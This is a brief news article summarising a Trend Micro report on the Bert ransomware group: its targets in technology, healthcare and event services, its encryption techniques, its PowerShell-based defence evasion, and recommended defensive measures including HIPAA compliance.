There is a new ransomware group that is attacking several industries, particularly technology, healthcare, and event services. Based on the latest Trend Micro report, the Bert ransomware group, tracked as Water Pombero, first attacked entities in the United States and Asia, though victims across Europe were also identified. It is believed to have originated from Russia, or may be linked to the region, since the group downloads and deploys its ransomware from a remote IP address registered in Russia, connected to ASN 39134.
The Bert Windows variant utilizes a simple code structure and a common AES algorithm for encryption. The group is active in creating and improving the ransomware and enhancing and simplifying operations. For example, the first iterations enumerated drives, left a ransom note in every directory, and obtained valid file paths and stored them in an array, only going forward with multi-threaded encryption following the collection stage. The most recent iteration utilizes ConcurrentQueue and creates a DiskWorker on every drive, permitting file encryption to begin the moment files are found, quickening file encryption.
It is presently uncertain how preliminary access is acquired to a victim’s network. As soon as access is acquired to the victim’s network, the attacker uses a PowerShell script to elevate privileges, deactivate the firewall, Windows Defender, and user account control (UAC). The script downloads the ransomware payload through a remote IP address and implements the payload. Ransomware groups widely use the PowerShell for post-breach activities because it is easy to avoid discovery. Trend Micro has likewise discovered a Linux sample that utilizes 50 threads to increase encryption speed, minimizing the risk of discovery or interruption. A number of code overlaps were discovered with the ESXi locker that the REvil ransomware group used until it stopped operations in 2021.
There will probably be other new ransomware groups, repurposing well-known tools and code, at the same time improving TTPs. Like in the case of the BERT ransomware group, basic tools can bring about successful attacks. This shows how upcoming groups don’t need complicated methods to be effective – only a reliable way to access their target, from attack, exfiltration, and eventually get a ransom from the victim.
Because the initial access vector is not yet determined, the best security is to employ proven safety guidelines, user training regarding email and internet safety, sandboxing to review files prior to execution, immediate patching, fortifying endpoint protection, limiting admin privileges, isolating networks, and consistently backing up files and keeping backups offline. Trend Micro likewise advises closely checking for PowerShell use and suspicious script execution, specifically for loaders like start.ps1 that deactivate security applications and elevate privileges. Complete TTPs and other suggestions are discussed in the Bert ransomware report. HIPAA compliance is also essential for covered entities as a safety measure.